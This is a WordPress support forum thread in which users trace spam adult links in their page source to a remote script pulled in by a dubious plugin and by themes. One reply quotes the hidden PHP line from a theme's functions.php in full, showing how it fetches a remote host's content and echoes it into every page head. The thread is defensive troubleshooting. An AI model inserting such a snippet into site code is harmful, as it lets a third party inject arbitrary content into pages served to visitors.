Support » Fixing WordPress » Un necessary care2.com links in my source file

  • Hello,
    My site is http://www.infiniteinnovations.net
    I was just looking at the source file and i found this

    [Code moderated as per the Forum Rules. Please use the pastebin]

    Mine is a web designing company site, i just dont understand where the links come form. Moreover these are adult tags and i wish to remove them at the earliest. I tried a lot of ways but i was not able to change the source file

    Question 2) How do i hide my wordpress info ? ( version , theme , etc )

    I am concerned with question 1 on top priority

    Kindly help

    Dinesh

Viewing 15 replies - 1 through 15 (of 24 total)
  • I’d been interested about this too: I believe it’s a hack and I don’t understand how it happened. Someone else? I’m using wordpress 3.3.1 and I’ve tried to secure my page as good as possible (e.g. it’s being monitored by WebsiteDefender.com). Pretty annoying …

    thanks, stefan

    I think I found something: I had a plugin called “WordPress Database Backup” (http://www.wordpressconnect.net/wordpress-database-backup-plugin/) installed. After deactivating it those nasty spam-links have now disappeared from the site’s sourcecode.

    ^ I uninstalled it .. Still I have the links

    I have the following plugins

    Askimet
    All in SEO
    Get the image
    Google XML Sitemaps
    Image Mouseover
    Login Lockdown
    Page Links to
    secure WordPress
    Sexybookmarks
    Superb Slideshow
    Super Simple Google Analytics
    WP Backup to dropbox
    copy protect
    minify
    smush.it
    super cache

    I wish to get those links removed at the earliest 🙁

    Sexybookmarks???

    go to this forum’s startpage, type care2.com into the search-field (right below “Search the Support Forums”) – for me the second hit is a link to

    Sexybookmarks

    … funny, isn’t it? I can’t say for sure it’s this plugin that causes the troubles but I find it quite remarkable that the search yields a link to this particular plugin as second result (right after a link to your post).

    What I would do: deactivate all plugins. See if the links still are in the webpage’s sourcode. If not, reactivate the plugins one after another. As soon as the links are back in the sourcode you know which plugin’s causing the troubles.

    good luck, Stefan

    the riddle’s answer:

    it’s not your blog that’s been hacked nor is it my blog – wpstats.org has been hacked!

    have a look: http://www.wpstats.org/jquery-1.6.3.min.js (look at the source-code of that webpage)

    … this doesn’t look like jQuery, does it?

    ^ watz the solution ?

    I want those adult links out of my code

    kinda simple: make sure your wordpress-code doesn’t link to http://www.wpstats.org/jquery-1.6.3.min.js
    very likely this will be the case within your plugins as they don’t necessarily rely on the existence of jQuery within wordpress (don’t know why – wordpress ships with jQuery anyway these days).

    an even better fix would be if the wordpress-team would fix wpstats.org but that might take some time…

    zero web

    (@codrutalexoaiagmailcom)

    I have found the problem.

    Check your installed theme “functions.php” for this line:

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

    For me, it was on line 3. Deleted the entire line, and…puff, no more sexy links in source code.

    Hope this helps, it took us some days of searching through the files….

    just once again:

    the problem isn’t the code in your or in my site – it’s wordpress.org resp. http://www.wpstats.org/jquery-1.6.3.min.js

    and the wordpress people don’t do anything about it :\

    zero web

    (@codrutalexoaiagmailcom)

    This is why I mentioned where the link to that file is, instead of waiting for someone else to fix this problem, I decided to fix it for myself. Google is indexing hidden divs, so…No more linked hacked scripts.

    unfortunately it’s not only there… it can possibly be found in the sources of hundreds of plugins and, as your example demonstrates, also themes. whoever hacked wpstats.org (can’t believe it’s been the wordpress-team itself) knew exactly about the consequences.

    btw: does anybody know how to notify the wordpress-team. i already sent them a message about that over twitter but they didn’t react. wpstats.org is in the current state for months now. don’t they know the site is hacked or do they not care?

    Moderator Jan Dembowski

    (@jdembowski)

    Brute Squad and Volunteer Moderator

    and the wordpress people don’t do anything about it :\

    wpstats.org is in the current state for months now. don’t they know the site is hacked or do they not care?

    I don’t think you mean what you think you mean.

    If the plugin you are referring to is hosted here and is doing dodgy things, please point out where that plugin is on http://wordpress.org/extend/plugins

    You haven’t done that yet.

    This one doesn’t have anything to do with WordPress despite the use of WordPress in their domain.

    http://www.wordpressconnect.net/wordpress-database-backup-plugin/

    That web site us doing something they must know they shouldn’t be doing.

    http://wordpress.org/about/domains/

    If you can provide a link on WordPress.ORG for a plugin that’s doing something dodgy, then that will make it easier to clean up.

    BTW wpstats.org doesn’t look like it has anything to do with WordPress.

    http://www.networksolutions.com/whois-search/wpstats.org

    ok, i see was probably wrong assuming wpstats.org belongs to wordpress.org – calling http://wpstats.org only forwards to http://wordpress.org.

    http://www.wordpressconnect.net/wordpress-database-backup-plugin/ is one of many plugins that links resp. embeds jQuery.js from http://www.wpstats.org/jquery-1.6.3.min.js (i’ve removed the call from the pugin’s code manually).

    indeed, http://www.wordpressconnect.net/wordpress-database-backup-plugin/ doesn’t seem to be listed on http://wordpress.org/extend/plugins – i only remember very vaguely i installed after it was recommended from my blog’s dashboard (usually i’m looking for plugins on http://wordpress.org/extend/plugins and don’t go searching the web over google or the like). maybe i should try to contact someone http://www.wordpressconnect.net … anyway this isn’t the only plugin resp. theme that links to wpstats.org…

    Moderator Jan Dembowski

    (@jdembowski)

    Brute Squad and Volunteer Moderator

    maybe i should try to contact someone

    You could attempt to contact them, but here’s why I don’t think that will get you anywhere.

    Their domain name contains “wordpress” in it. That’s a huge no-no.

    But wait! There’s more! Their logo is a fairly blatant spin on Amazon’s logo.

    Those same folks have another plugin in the WordPress repository. That plugin sound like it’s a little dodgy with embedding their own affiliate code into the plugin and having this explanation in the forum:

    I see not harm in adding my affiliate code, specially when the user do have the option to disable it in the backend.

    This may or may not be in the current version of the plugin, but it speaks volumes that they would consider making it opt-out instead of opt-in.

    I do not know if putting in their own affiliate code is permitted in the WordPress repository or if it’s against the rules. But I do think it’s questionable behavior.

    The fact that they also host a questionable plugin on their own site with dodgy code would make me avoid them and their software like the plague.

Viewing 15 replies - 1 through 15 (of 24 total)
  • The topic ‘Un necessary care2.com links in my source file’ is closed to new replies.